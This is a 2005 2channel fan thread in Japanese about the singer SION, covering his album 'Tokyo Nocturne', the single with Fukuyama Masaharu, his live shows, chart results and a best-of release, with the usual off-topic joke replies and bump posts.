2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

SION〜東京ノクターン

1 :名無しさん@お腹いっぱい。:2005/06/10(金) 16:27:52 ID:JEVhGfnp
声、歌詞、生き様、これほど暖かい音楽はなかなかないね。
聞くとやたらと酒が飲みたくなるし、
明日6月11日は毎年恒例の野音ライブです。
20周年目を迎え、まだまだ進化するSIONについて語りましょう。


2 :名無しさん@お腹いっぱい。:2005/06/10(金) 16:34:23 ID:JEVhGfnp
というか、SIONスレってないよね?
検索しても出てこなかったんで思わず立てたけど。
かぶってなければいいなぁ。

3 :名無しさん@お腹いっぱい。:2005/06/10(金) 16:54:49 ID:1DSqSQ8i
SION良い

4 :名無しさん@お腹いっぱい。:2005/06/10(金) 17:06:49 ID:JEVhGfnp
>>3
いいっすよねぇ。
もう僕なんて何度助けられたことか。
明日のライブ行きます?
僕は九州から駆けつけちゃいますもんねっ!
毎年この時期だけは仕事サボって行っちゃいます。
去年は酔っ払って仲良くなった兄ちゃんから「これで飲め」って5000円もらった。
名前も携帯番号もきかなかったけど、また会えるといいなぁ。

5 :名無しさん@お腹いっぱい。:2005/06/10(金) 17:55:28 ID:1DSqSQ8i
お金ないからライブも行けないしアルバムも買えないよ。・゜・(/Д`)・゜・。
でもシングルは限定DVD付なので買いました


6 :名無しさん@お腹いっぱい。:2005/06/10(金) 20:10:39 ID:qHeNDsNL
明日のライブは雨が降ったらどうなるの?

7 :名無しさん@お腹いっぱい。:2005/06/10(金) 23:05:35 ID:FOxrBaXM
6/28発売
BSフジMUSIC INDEX Hi-Vision Premium Liveのスタジオライブ完全版

http://www.amazon.co.jp/exec/obidos/ASIN/B0009VRHUG/qid%3D1118124428/250-9822644-6269846

8 :名無しさん@お腹いっぱい。:2005/06/11(土) 00:31:17 ID:QMqb0774
「たまには自分を褒めてやろう!!」について語らないか
SIONファン、福山ファンはそれぞれどう思ってるのだろう?

9 :九州のんべぇ:2005/06/11(土) 01:38:15 ID:tfXLsQxv
やべぇ、明日のライブのこと考えたら眠れない。
朝早くから飛行機のらないかんのに。
焼酎がぶ飲みしなきゃ!
今回の福山さんとのカップリングは会社クビになってたらしいシオンのアニキが助けられた感じで正直嬉しい!
個人的にはシオンのカバーやってたり、オールナイト日本で世話になったり、
なにより九州だし福山さん大好きです
ホントにありがてぇっす。

10 :名無しさん@お腹いっぱい。:2005/06/11(土) 02:24:40 ID:Uh8RWz6s
>>8
この前「僕らの音楽」
にそろって出てたよね〜
パソコンに録画してたから、
あれから毎日再生してるよ〜。
というか、仕事から帰ってずーっと繰り返し再生してたりする。。。
二人の掛け合いが最高にイイ!
いい大人二人って感じで。
福山ファンなのだけど、
SIONさんもファンになったよ〜

11 :名無しさん@お腹いっぱい。:2005/06/11(土) 03:58:02 ID:hNXqvUNM
>>10
オレも福山ファン。だけどSIONにはまりそう。いい歌作るよね〜。野音にも行くよ!

12 :名無しさん@お腹いっぱい。:2005/06/11(土) 04:15:57 ID:Ult9ylJG
明日彼氏とその友達が行くょ〜

13 :名無しさん@お腹いっぱい。:2005/06/11(土) 09:14:14 ID:QMqb0774
意外と好印象なのかな
自分はSIONファンで福山も好き
多くの人がSIONの歌を聴く機会が設けられたのは嬉しいけど
福山の力でチャート上位にいくってのがファンとして微妙
あと今回のシングル、福山はコーラスとギターだけなのに
「SIONと福山雅治」って表記するのが汚いなあと思ってしまった
こう書かれると二人が掛け合いで歌うと思わない?

14 :名無しさん@お腹いっぱい。:2005/06/11(土) 12:06:01 ID:93rkmE7m
>>13
そうだよねぇ〜。
でも、「僕らの音楽」で、福山が曲つくりしてる時に、
「この先輩(SIONさん)は何〜にも言わないんですよ〜」
って言ってたから、
曲作りって所では福山が主導?
みたいだからいいんでない?

15 :名無しさん@お腹いっぱい。:2005/06/11(土) 13:46:53 ID:hNXqvUNM
降水確率50%
降るなよ〜。

16 :名無しさん@お腹いっぱい。:2005/06/11(土) 19:32:06 ID:vYD2gYzr
おーSIONのスレだぁー。
「蛍」とか「12号室」が好きでした(暗いかな
昔ライブ行ったなぁ。
今もバリバリ現役なんですね。
アルバム買おうかなぁ。

17 :名無しさん@お腹いっぱい。:2005/06/11(土) 20:30:48 ID:QMqb0774
>14
編曲は福山がやったみたいだしね
でも単純に名曲だ
ヘビーローテーションで聴きまくってるよ


18 :名無しさん@お腹いっぱい。:2005/06/11(土) 21:01:32 ID:QMqb0774
YAON終わったかな

19 :名無しさん@お腹いっぱい。:2005/06/11(土) 22:21:28 ID:hNXqvUNM
ただいま。楽しかった〜。アルバム買おうかな。

20 :名無しさん@お腹いっぱい。:2005/06/12(日) 00:54:50 ID:hjR8EYP8
>>17
そうなんだ。。

こういう人たちいると日本の音楽のありがたみというか、暖かさみたいなのが感じる・・・
ファンもいい人多いし

21 :名無しさん@お腹いっぱい。:2005/06/12(日) 02:06:29 ID:lS+/iIHn
僕らの音楽でSIONさんが歌っていた「曇り雲、ふたりで」という曲を探しているのですが見つかりません、なんのアルバムに入っているのでしょうか?

22 :名無しさん@お腹いっぱい。:2005/06/12(日) 02:12:08 ID:Vr1RKMKY
「曇り空、ふたりで」はシングル「たまには自分を褒めてやろう/SIONと福山雅治」のカップリング曲です

23 :名無しさん@お腹いっぱい。:2005/06/12(日) 02:19:57 ID:9VLZ89HL
>>21
22に補足するとそれと同日に発売されたアルバム「東京ノクターン」にも入ってるよ。

24 :名無しさん@お腹いっぱい。:2005/06/12(日) 03:07:51 ID:4PQI1N9t
ライブすげぇ良かったですねぇ。
1曲目のSORRYBABYで早くも涙
好きなときに飛べとかホント凄かったぁ

個人的には通報されるくらいにが聴きたかったなぁという
濱マイク流れでSIONファンになった漏れとしてはあるが
あのテンションでやったら多分壊れたな<色々

25 :名無しさん@お腹いっぱい。:2005/06/12(日) 13:40:46 ID:razVaejz
『僕らの音楽』見ました宦u曇り空、ふたりで」は名曲だね。あーゆーフレーズ書けるのはSIONしかいないァ品がないよで品がある…。不思議な人です。

26 :名無しさん@お腹いっぱい。:2005/06/12(日) 19:46:19 ID:Vr1RKMKY
YAON終わっても盛り上がらないこのスレの運命やいかに

27 :名無しさん@お腹いっぱい。:2005/06/12(日) 22:19:00 ID:hjR8EYP8
>>26
激しくマターリ進行

28 :名無しさん@お腹いっぱい。:2005/06/13(月) 00:52:40 ID:MpnHWpgv
SORRY BABY 誰かさんみたいに 俺に

29 :NO MUSIC NO NAME:2005/06/13(月) 01:11:50 ID:bz/JuGF4
6/11の野音、最高だったなぁ。
『ガード下』を聴けて本当に良かった。
冬にまた「恵比寿リキッドルーム」か「新宿ロフト」でやって
ほしいなぁ。その時は久しぶりに『冬の街で』を聴きたいなぁ。。。

30 :NO MUSIC NO NAME:2005/06/13(月) 01:20:35 ID:Rpd7zA42
伝説板にもありますよ

http://music4.2ch.net/test/read.cgi/legend/1113550989/

31 :NO MUSIC NO NAME:2005/06/13(月) 01:27:35 ID:MpnHWpgv
こっちが盛り上がらないわけだw

32 :NO MUSIC NO NAME:2005/06/13(月) 13:30:59 ID:MpnHWpgv
死にそうになるまでは
生きてることを忘れてる
感謝はむずかしい

33 :NO MUSIC NO NAME:2005/06/14(火) 02:15:44 ID:5NcAbld4
最近聞いてないなぁ

34 :NO MUSIC NO NAME:2005/06/14(火) 12:55:35 ID:T9AppbfE
プラネットチャート
初登場15位
たまには自分を褒めてやろう 〈DVD付限定盤〉
SIONと福山雅治
2005/6/8 BVCH-49602〜3 12700p

TOP10に入って欲しかったが残念

35 :NO MUSIC NO NAME:2005/06/14(火) 12:58:05 ID:6S4qnIMO
しかし、大躍進じゃないか。
素直に喜びたいが、この先どうなるのかな・・・。

36 :NO MUSIC NO NAME:2005/06/14(火) 14:28:55 ID:Skv7Eifq
通常盤との合計じゃないんだね?

37 :NO MUSIC NO NAME:2005/06/14(火) 14:42:24 ID:T9AppbfE
オリコンでは14位でした

オリコンは限定版と通常版を一緒に集計するけど
プラネットは確か別々だったはず
プラネットで通常版は50位以内にも入ってませんでした

38 :NO MUSIC NO NAME:2005/06/14(火) 16:56:45 ID:rWf2kFlJ
アルバムはダメだったっすか。

39 :NO MUSIC NO NAME:2005/06/14(火) 18:01:23 ID:/mBruAlP
SIONいいよね。大好きだな。


40 :NO MUSIC NO NAME:2005/06/15(水) 02:59:14 ID:tbRrtCAK
>38
♪そんなわけないじゃん

41 :NO MUSIC NO NAME:2005/06/15(水) 18:58:31 ID:l4QepuC7
SIONファンって他に何聴くの?
ちなみにオレはTHE BOOMと一青窈が好き

42 :NO MUSIC NO NAME:2005/06/16(木) 19:53:49 ID:MZ54eRse
俺は、八代亜紀。

43 :NO MUSIC NO NAME:2005/06/16(木) 20:23:55 ID:+maiKvbF
シェイディー・ドールズとレッド・ウォーリアーズ

44 :NO MUSIC NO NAME:2005/06/17(金) 22:01:31 ID:6Ckv53/+
THE GROOVERS

45 :NO MUSIC NO NAME:2005/06/17(金) 23:46:06 ID:ZgIk5AVP
MC5


46 :NO MUSIC NO NAME:2005/06/19(日) 13:15:24 ID:2qaYCtRn
>>41
俺は、森進一。

47 :NO MUSIC NO NAME:2005/06/20(月) 21:34:42 ID:jW5eRqBk
俺は洋楽だと……トム・ウェイツ、クラッシュ、デヴィッド・ボウイ
  邦楽なら……ナンバーガール

48 :NO MUSIC NO NAME:2005/06/21(火) 21:00:10 ID:M+veRKnt
仲井戸CAHBO麗市とか。

このへんは福山の趣味とかぶってるような気がする。
彼のCDを買ったことないけど、ちょっと興味あり。

49 :NO MUSIC NO NAME:2005/06/22(水) 09:52:42 ID:1iJaingl
>>41
俺は、山本譲二。

50 :NO MUSIC NO NAME:2005/06/22(水) 23:40:04 ID:NnI/oEr5
ヒートウェイヴ、THE BOOM、水戸華之介

51 :NO MUSIC NO NAME:2005/06/23(木) 09:36:07 ID:03NyKaHB
>>41
俺は、北島三郎。

52 :NO MUSIC NO NAME:2005/06/23(木) 17:42:38 ID:03NyKaHB
>>41
鳥羽一郎も聞く。

53 :NO MUSIC NO NAME:2005/06/24(金) 13:56:34 ID:yC3//hJJ
>>41
俺は山川豊

54 :NO MUSIC NO NAME:2005/06/25(土) 08:31:11 ID:Cil5DnAb
>>41
俺は五木ひろし。

55 :NO MUSIC NO NAME:2005/06/25(土) 11:15:20 ID:Cil5DnAb
>>41
あと新沼謙治も聴くよ。

56 :NO MUSIC NO NAME:2005/06/25(土) 11:16:25 ID:Cil5DnAb
>>41
あと新沼謙治も聴くよ。

57 :NO MUSIC NO NAME:2005/06/25(土) 12:20:36 ID:/KfQ2JpF
演歌ヲタスレはここですか?

58 :NO MUSIC NO NAME:2005/06/26(日) 12:32:33 ID:i3nQoTsV
汚ねえ声で歌ってんじゃねえ

59 :NO MUSIC NO NAME:2005/06/26(日) 19:33:56 ID:3CJGoyWZ
ttp://m.pic.to/a3gt

60 :NO MUSIC NO NAME:2005/06/27(月) 10:45:57 ID:HwYMHATR
>>41
俺は大川栄作

61 :NO MUSIC NO NAME:2005/06/27(月) 10:51:50 ID:6nqQ5DiC
全国チケット掲示板 S.O.S

http://jet7265.at.infoseek.co.jp/

62 :NO MUSIC NO NAME:2005/06/27(月) 12:11:48 ID:vzmN90St
>>41

         ∧_∧   ┌────────────
       ◯( ´∀` )◯ < 僕は、神山満月ちゃん!
        \    /  └────────────
       _/ __ \_
      (_/   \_)
           lll

63 :NO MUSIC NO NAME:2005/06/28(火) 07:40:05 ID:RiKLseO3
>>41
俺は、冠二郎!

64 :NO MUSIC NO NAME:2005/06/28(火) 14:00:40 ID:RiKLseO3
>>41
あと香田晋も。

65 :NO MUSIC NO NAME:2005/06/29(水) 17:50:45 ID:SfRGX3Ix
>>41
俺は前川清。

66 :NO MUSIC NO NAME:2005/07/02(土) 16:43:51 ID:zJnnHguO
>>41
俺はビリーバンバン

67 :NO MUSIC NO NAME:2005/07/04(月) 18:16:14 ID:HhV1GAP4
>>41
俺は山川豊

68 :NO MUSIC NO NAME:2005/07/06(水) 09:13:34 ID:vjpmAH8t
>>41
俺は南こうせつ

69 :NO MUSIC NO NAME:2005/07/06(水) 21:12:48 ID:2Mc8Cw3d
>>55
新沼謙治とニール・マッケンジーって聞き間違いしやすいよね

70 :NO MUSIC NO NAME:2005/07/07(木) 08:02:02 ID:KUOrYsIk
>>それうちのおばあちゃんもいってたわ

71 :NO MUSIC NO NAME:2005/07/08(金) 08:26:50 ID:EkgXxyMw
>>41
俺は中島みゆき

72 :NO MUSIC NO NAME:2005/07/08(金) 17:37:07 ID:M2jLMcXr
Strange LiveとTrue Liveは再発しないんだろうか
風来坊は前者。天国の扉は後者が一番かっこいいんだけど
むかーし入れたMDでしか持ってない

73 :NO MUSIC NO NAME:2005/07/10(日) 07:18:34 ID:DDOwRH6m
>>41
俺は角川博

74 :NO MUSIC NO NAME:2005/07/11(月) 09:07:42 ID:IEEruwvS
>>41
俺は、さだまさし

75 :NO MUSIC NO NAME:2005/07/11(月) 22:41:17 ID:EZ+m58Vi
41 俺は清春、がラジオで「通報されるくらいに」をかけてシオンを知った

76 :NO MUSIC NO NAME:2005/07/12(火) 07:08:39 ID:3TidXd/I
>>41
俺は助清、がラジオで「通報されるくらいに」をかけてシオンを知った


77 :NO MUSIC NO NAME:2005/07/14(木) 09:29:50 ID:FlP1MOn3
>>41
俺は郷ひろみ

78 :NO MUSIC NO NAME:2005/07/15(金) 17:36:36 ID:t2yVLOdj
SIONのスレだーと思って開いたら
SIONの話題全然無いでやんの
何この糞スレ

79 :NO MUSIC NO NAME:2005/07/18(月) 00:35:15 ID:3zu86z4K
通報されるくらいにって何に入ってる?

80 :NO MUSIC NO NAME:2005/07/18(月) 02:42:29 ID:VbQD9obZ
>>79
Comes

81 :NO MUSIC NO NAME:2005/07/18(月) 03:37:54 ID:A5Wiuw08
通報されるくらいにも良いけど、お前がいるのほうが好き

82 :NO MUSIC NO NAME:2005/07/18(月) 22:35:33 ID:c38i/ihO
俺は最近のはきいてなかったけど、蛍が一番好きだな。
SION・春夏秋冬・Strange but Trueあたりもいいけど。

83 :NO MUSIC NO NAME:2005/07/19(火) 00:07:10 ID:TmnILEdG
最近のも聴くべし。DISCHARGEなんかだと違和感ないはず。
スマイリーは当然いないわけだが松田文さんはずっと一緒。
SONGSで声質が相当変わったけどロックバンド然としたたたずまいは昔以上。
ルースターズの池畑さんがいるから重いやつだとかなりヘヴィ。
懐メロになっちまうような活動はしてないぞ

84 :NO MUSIC NO NAME:2005/07/19(火) 00:59:07 ID:wiGcxkFu
SIONは鉄人44号として現役なんである

85 :NO MUSIC NO NAME:2005/07/19(火) 05:45:33 ID:NU6fmg8Y
自分はNieA_7の主題歌からファンになった

86 :SORRYBABE:2005/07/22(金) 11:42:13 ID:2pXM35/G
テスト テスト テスト を 重ねて...

87 :NO MUSIC NO NAME:2005/07/22(金) 22:12:21 ID:ZebO44E/
ttp://info.hmv.co.jp/p/t/1482/201.html
こんなの見っけたんだけど詳細分かる人います??

88 :NO MUSIC NO NAME:2005/07/22(金) 23:50:04 ID:MBYKVdwL
初めて見た。うりきちのサイトにもとりあえず情報はない。
しっかしこのタイミングでベストかよ

89 :NO MUSIC NO NAME:2005/07/23(土) 00:05:05 ID:V0l4QCFy
ttp://www.hmv.co.jp/product/detail.asp?sku=1482201
DVD付きって。。。しかも2800円

90 :NO MUSIC NO NAME:2005/07/23(土) 00:43:25 ID:Rue5TNfC
やっぱりベストですか
SONGSとか今じゃ買えないから欲しいかも
収録曲気になる・・・

91 :NO MUSIC NO NAME:2005/07/23(土) 00:59:44 ID:yp7So3Br
たまにはageますね。

メルマガにあったSION MUSIC INDEX Hi-Vision PREMIUM LIVE
てやつの
>※一般発売は、9月リリース予定
てやつと連動か?

92 :NO MUSIC NO NAME:2005/07/23(土) 14:46:31 ID:S17ch1ue
>>87 >>89
情報さんくす。
1998-2003って何の意味があるのかな?
単に東芝時代?

93 :SORRYBABE:2005/07/23(土) 17:15:41 ID:jeqc7ogr
emi欲しいねぇ...でも「俺の声」持ってるからなぁ.
被って無い曲が10曲以上で予約かな.

いや,DVDを最初から狙い撃ち...

っつぅか復刻版出した後にベストを出す辺りがさり気にカッコイイ.

94 :NO MUSIC NO NAME:2005/07/23(土) 21:59:39 ID:yp7So3Br
1998でSION Comes
2003が前のアルバムだから単純にEMI時代のベストだろ。
在庫切れ起こしてるSONGSとかの再発をせずに
EMI時代をベストでお茶濁そうとしてるとしたら
「さり気にカッコイイ」なんて呑気な状態ではないのだと思われ。

まさかEMIも切られるんじゃねえだろうな、おい

95 :NO MUSIC NO NAME:2005/07/24(日) 00:40:22 ID:GQDIkoOa
Amazonにもあった。10%off!

http://www.amazon.co.jp/exec/obidos/ASIN/B000A7TFAO/unnaturalgroo-22/ref=nosim/

>>94
すでにBMGに移籍してますよ。

96 :NO MUSIC NO NAME:2005/07/24(日) 00:45:30 ID:uaPPOPcc
>>94
SIONの新譜買え!

97 :NO MUSIC NO NAME:2005/07/24(日) 03:36:00 ID:OBrQCwvz
泉谷〜SIONで流れてきたファンです。
悪いけど福山が歌うSIONは聴けないな。
何かこう、夜のいらつくイメージじゃないんだな。
”風向きが変わっちまいそうだ”福山歌えるかい。
SION本人もこの頃は「きつい唄ばかり歌ってた。」

98 :NO MUSIC NO NAME:2005/07/24(日) 03:50:01 ID:kkO/OjAW
ようこそ、なんだけどSION今でもきつい唄歌ってるわい。
SNOWDROPなんて逆に若い頃のSIONには歌えないんじゃね。
>>95
素で気づかんかった、、、。orz

99 :通りすがりたがり:2005/07/24(日) 12:42:46 ID:OSElzyj0
9月28日発売か...
収録曲が気になり過ぎる...

東京ノクターン...車でずっと聞いてる...
あかんわ,泣けてきた.
訳も無く夏の終わりが寂しいのは子供だけじゃないんだぜ...

100 :NO MUSIC NO NAME:2005/07/26(火) 07:28:40 ID:lg7+78jv
SIONファンって他に何聴くの?
ちなみにオレはTHE BOOMと一青窈が好き


101 :NO MUSIC NO NAME:2005/07/26(火) 09:36:57 ID:qbA2uuaY
もういい加減にしろ糞ボケ

102 :NO MUSIC NO NAME:2005/07/26(火) 20:59:03 ID:lg7+78jv
>>100
俺は2代目あばれはっちゃく

103 :NO MUSIC NO NAME:2005/07/31(日) 08:25:31 ID:Wftybu6Q
保守

104 :NO MUSIC NO NAME:2005/08/01(月) 21:50:30 ID:F99J66tp
sssssssssssssssssssssss


sss








             ssssssssssssssssss        ssss

105 :NO MUSIC NO NAME:2005/08/02(火) 07:32:11 ID:RjRZwk1L
実写版テルだけはガチ


106 :NO MUSIC NO NAME:2005/08/05(金) 21:23:13 ID:biRJO4JY
SION COMESってもう手に入らない?ドコ探してもない

107 :NO MUSIC NO NAME:2005/08/05(金) 21:51:50 ID:w5KFh8vv
>>106
iTMSでダウソか、中古探すしか。。。

108 :NO MUSIC NO NAME:2005/08/05(金) 23:17:36 ID:w5KFh8vv
>>106
つかSIONオフィから買えるでしょ?

109 :NO MUSIC NO NAME:2005/08/06(土) 08:12:58 ID:E8XSR5PU
保守

110 :NO MUSIC NO NAME:2005/08/09(火) 12:02:45 ID:Q1ZX3lbq
夕焼け たまんないね

111 :NO MUSIC NO NAME:2005/08/10(水) 01:56:06 ID:eLtBHIvl
コジキシンショーo(・∀・)oイイッ!!

112 :NO MUSIC NO NAME:2005/08/11(木) 17:38:24 ID:RSoZQh4W
SIONファンって他に何聴くの?
ちなみにオレはTHE BOOMと一青窈が好き


113 :NO MUSIC NO NAME:2005/08/11(木) 18:48:47 ID:+DUvb9rs
>>112

    〃∩∧_∧
   ⊂⌒(  ・ω・)  はいはいわろすわろす
     `ヽ_っ⌒/⌒c     
        ⌒ ⌒



114 :NO MUSIC NO NAME:2005/08/12(金) 14:42:41 ID:uevMJdVn
SIONファンですが他に「くるり」「斉藤和義」聞きます.
偶に「m.c.A.T」とか.
でもやはりSIONに戻って来てしまう.

今でも自主製作盤の「俺の声」がたまらん...

115 :NO MUSIC NO NAME:2005/08/12(金) 20:34:40 ID:zhZYeE2N
>>114
>>41-78

116 :NO MUSIC NO NAME:2005/08/13(土) 21:36:33 ID:1/b48yxZ
2005年8月14日 3:35〜4:35
<DO!深夜・メディアの苗床>
SION MUSIC INDEX Hi−Vision PREMIUM LIVE
【OA予定曲】
●SORRY BABY
●ちょっといいな
●午前3時の街角で
●お前がいる
●がんばれがんばれ
●どこに行くんだろう
●彼女少々疲れぎみ
●砂の城

117 :NO MUSIC NO NAME:2005/08/15(月) 02:14:55 ID:LHF5ip2W
>>116ので初めて見たんですが、俺の声が入ってる
初心者の入り口に適したアルバムてありますか?

118 :NO MUSIC NO NAME:2005/08/15(月) 02:52:22 ID:Rh82B3yk
>>117
ttp://www.amazon.co.jp/exec/obidos/ASIN/B00005O5VE/
題名も『俺の声』っちゅうベストアルバム
でもオススメで『12号室』っていう名曲も収録されているこっちもベストアルバム
ttp://www.amazon.co.jp/exec/obidos/ASIN/B00007AJTD/
どっちもそれぞれイイですよ。

119 :NO MUSIC NO NAME:2005/08/17(水) 21:10:28 ID:9kkQzxii
104 :NO MUSIC NO NAME:2005/08/01(月) 21:50:30 ID:F99J66tp
sssssssssssssssssssssss


sss








             ssssssssssssssssss        ssss


105 :NO MUSIC NO NAME:2005/08/02(火) 07:32:11 ID:RjRZwk1L
実写版テルだけはガチ



106 :NO MUSIC NO NAME:2005/08/05(金) 21:23:13 ID:biRJO4JY
SION COMESってもう手に入らない?ドコ探してもない


107 :NO MUSIC NO NAME:2005/08/05(金) 21:51:50 ID:w5KFh8vv
>>106

120 :NO MUSIC NO NAME:2005/08/25(木) 00:42:32 ID:dbbdKnnu
9月20日のイベントを知ってるか?

121 :NO MUSIC NO NAME:2005/08/26(金) 09:30:22 ID:3V5lWR5K
>>120
9/24じゃないの?

122 :NO MUSIC NO NAME:2005/08/26(金) 12:31:07 ID:tZiUui+y
『スイッチ』は、次号2005年10月号から12月号にかけての3号を、創刊20周年記念号として展開します。
そしてほぼ同じ時代を歩み、昨年25周年を迎えたタワーレコードと連動して、いくつかの記念イベントを開催します。
イベント第1弾は、次号の特集に迎える福山雅治と、シングル「たまには自分を褒めてやろう」で
コラボレートしたSIONの2人が登場するスペシャル・イベントです。

■SWITCH ON LIVE 開催日時
日時:2005年9月20日(火)開場:18:00/ 開演:19:00
場所:LIQUIDROOM 【恵比寿】www.liquidroom.net
入場:無料(読者招待)【1ドリンクチャージ】

■応募要項
応募ハガキ入手方法
1:当ウェブサイトにてSWITCH最新号(SWITCH vol.23 no.9)を2005年8月29日までにご購入された方
(1回のご注文につき応募ハガキ1枚の発送です)
2:全国のタワーレコードにてSWITCH最新号(SWITCH vol.23 no.9)をご購入された方
3:SWITCH本誌の定期購読をされている方


123 :NO MUSIC NO NAME:2005/08/26(金) 14:32:01 ID:OpRtZg5p
>1:当ウェブサイトにてSWITCH最新号(SWITCH vol.23 no.9)を2005年8月29日までにご購入された方
(1回のご注文につき応募ハガキ1枚の発送です)

何処か教えて〜!

124 :NO MUSIC NO NAME:2005/08/26(金) 15:56:40 ID:tZiUui+y

少しはぐぐりなさい。

http://www.switch-pub.co.jp/

125 :NO MUSIC NO NAME:2005/08/29(月) 00:29:43 ID:MZJmvGDL
20年ほど昔、まだ幼かった私がラジオの深夜放送で聞いたフレーズが忘れられない。

 今信号は黄色 渡るも渡らんもあんた次第・・・

当時学校のこと、自分の生き方のこと、深く悩んでいた頃だった。SIONだったことを思い出し、ここにたどりつきました。何で曲か知らない失礼なヤツですが、当時深夜放送を寝床で聞きながら涙した頃を思い返します。

今は人の親になり、いい年のオヤジだけど、時々思い出します。何かのアルバムに入っているなら、もう一度聞きたいと思う今日この頃です。

126 :NO MUSIC NO NAME:2005/08/29(月) 23:34:47 ID:EqPpEcLj
sage

127 :NO MUSIC NO NAME:2005/08/30(火) 00:24:14 ID:SE0y2Sf9
>>122
行きたいなあ。・・・

128 :NO MUSIC NO NAME:2005/08/31(水) 12:30:48 ID:bVODMOPB
>>125
「かわいい女」に入ってる信号という曲です。
復刻されて買いやすくなってるのでどうぞ。

129 :NO MUSIC NO NAME:2005/09/02(金) 13:44:10 ID:m3VSGA7F
SIONの今度のアルバムの収録曲...いつのまにか出てやがる...
ほ,ほすぃ...嗚呼...保守ぃ!

ttp://www.hmv.co.jp/product/detail.asp?sku=1482201

130 :NO MUSIC NO NAME:2005/09/02(金) 15:34:43 ID:0wShDUWZ
うほっ『もう一回』が来てる!!
東芝EMI解ってんなぁ

131 :NO MUSIC NO NAME:2005/09/03(土) 12:33:53 ID:7HiAhhZd
僕はDVDが楽しみやわー
ってもう一回ってどんな曲か分からんけど何か良い反応?

132 :トミノ:2005/09/13(火) 22:11:07 ID:MEOQW7X6
東京ノクターンでは「地下鉄」好き。


133 :NO MUSIC NO NAME:2005/09/16(金) 13:50:57 ID:6OJdQa0a
SIONファンって他に何聴くの?
ちなみにオレはTHE BOOMと一青窈が好き


134 :NO MUSIC NO NAME:2005/09/16(金) 14:42:34 ID:oEdfbBXD
LOFTの初日は時間的にどれくらいやるんだろ?
8時STARTだからなぁ。

135 :NO MUSIC NO NAME:2005/09/16(金) 17:11:22 ID:qzs8w3Uz
東京ノクターンではtestが好きやわ.
9月28日が待ち遠しい.


136 :NO MUSIC NO NAME:2005/09/18(日) 19:38:05 ID:ln6NfuTB
 

137 :NO MUSIC NO NAME:2005/09/20(火) 03:04:07 ID:G0d35bJY
俺はダーリンが好きかなぁ、
アホみたいににダーリンダーリン言ってる感じがいい。
testのトントコトコも好きだけどな。


138 :NO MUSIC NO NAME:2005/09/20(火) 04:14:16 ID:Se1Zw0pO
619 名前:名無し募集中。。。[] 投稿日:2005/09/19(月) 12:34:38 0
Berryz工房 9thシングル
「やりきれない夜が通り過ぎたあとに」
2005/11/23発売

1.やりきれない夜が通り過ぎたあとに
  (映画「プリキュア2」主題歌)
2.また シラフの朝へと放り出される
3.やりきれない夜が通り過ぎたあとに(Instrumental)

139 :NO MUSIC NO NAME:2005/10/01(土) 13:12:10 ID:ltHAvy4i
早瀬優かこ(フォノグラム)の二番煎じですね

140 :NO MUSIC NO NAME:2005/10/03(月) 17:41:27 ID:V82D12hQ
はじめまして

はじめまして

はじめまして


141 :NO MUSIC NO NAME:2005/10/07(金) 00:39:35 ID:u7DE+T1a
徐々にのラストの今堀さんすごいね

142 :NO MUSIC NO NAME:2005/10/11(火) 16:08:02 ID:tZlW2o2u
ライブ帝国を見ました
とても格好良かったです

143 :NO MUSIC NO NAME:2005/10/15(土) 01:28:51 ID:/teZoaTE
生で観たらもっとカッコいいぞー。

144 :NO MUSIC NO NAME:2005/10/15(土) 16:37:43 ID:62thsLwZ
今日ロフト行く人居ますか??

145 :NO MUSIC NO NAME:2005/10/16(日) 00:23:59 ID:RC5sPHn5
行ってきたよー。
筋肉痛になっちゃったよー。
だって1曲目が‘風向きが変わっちまいそうだ‘だよー。
昔の曲オンパレードで楽しかったー。

146 :NO MUSIC NO NAME:2005/10/16(日) 01:37:43 ID:PONkpCFR
熱かったなぁ。
まだ耳がぼわ〜んとしちょる。
ちょっとだけどシオン触ちった。
足は筋肉痛だな、やっぱりw

147 :NO MUSIC NO NAME:2005/10/17(月) 18:10:40 ID:bFGM6w1w
風向きが変わっちまいそうだからかーイイナー

148 :NO MUSIC NO NAME:2005/10/22(土) 02:21:35 ID:BEb21CQV
best買った 良かった。

149 :NO MUSIC NO NAME:2005/10/24(月) 14:24:52 ID:v9S9sDNt
>>148
アルバム全部持ってるんだけど、買う価値ある?

150 :NO MUSIC NO NAME:2005/10/24(月) 19:17:58 ID:2M3U8kCF
aru

151 :NO MUSIC NO NAME:2005/10/24(月) 23:44:39 ID:0BDbaliP
全部持ってるならやめたほうがいいかと
ジャケットにも歌詞カードにも写真は無いし
おまけdvdのために買うのはどうかな

揃えたいのなら。

152 :NO MUSIC NO NAME:2005/10/26(水) 00:07:58 ID:Oqm3sqXo
いらないわ


153 :NO MUSIC NO NAME:2005/11/03(木) 00:38:10 ID:2q3H++Bm
濱マイクに出てたよね?

154 :NO MUSIC NO NAME:2005/11/04(金) 23:10:29 ID:v+crgJNH
SION、新しいマネージャーさん探してるよ
誰か行っておいでよ

155 :NO MUSIC NO NAME:2005/11/06(日) 20:36:47 ID:VraxuBHS
age

156 :NO MUSIC NO NAME:2005/11/08(火) 21:08:41 ID:7X7AZ37G
本当に人がいないですね。

157 :NO MUSIC NO NAME:2005/11/09(水) 20:38:23 ID:RcdA6K2R
この人テラカッコヨスwww

158 :NO MUSIC NO NAME:2005/11/13(日) 23:20:17 ID:JP4iy+f7
保守age

159 :NO MUSIC NO NAME:2005/11/14(月) 22:00:29 ID:ebTmT1Ex
SION好きなんだけど…
ここまで人がいないと悲しくなるな

160 :NO MUSIC NO NAME:2005/11/15(火) 21:34:18 ID:W4Y6pY+M
じゃあ点呼とりまーす


161 :NO MUSIC NO NAME:2005/11/15(火) 21:55:54 ID:U/waJ7HI
にー

162 :NO MUSIC NO NAME:2005/11/15(火) 22:19:38 ID:UB7Jbifs
162

163 : ◆SION.vzq.E :2005/11/16(水) 08:01:49 ID:lzkjPBSq
163

164 :NO MUSIC NO NAME:2005/11/17(木) 18:14:05 ID:9YVI+YRr
うりきちのHP見ました。
SIONてコワい人かと思ってたけど
優しくて温かい人柄がすごく伝わってきて、
地元山口なのに認識不足だったと申し訳なくなりました。
これからCDいろいろ聴いて応援します。
  

165 :NO MUSIC NO NAME:2005/11/17(木) 22:42:35 ID:WKUlt03d
でも残念ながら、テイチク時代のものは再発されたものの、
EMIの頃のが手に入りにくかったりするんだよね。
ちゃんとしてほしい、拝啓EMI殿。

166 :164:2005/11/18(金) 10:44:09 ID:sEeyHXgK
とりあえず聴けるものからで・・・。新参ですし。
でもハマった時聴けない曲があったら
寂しいなぁ。



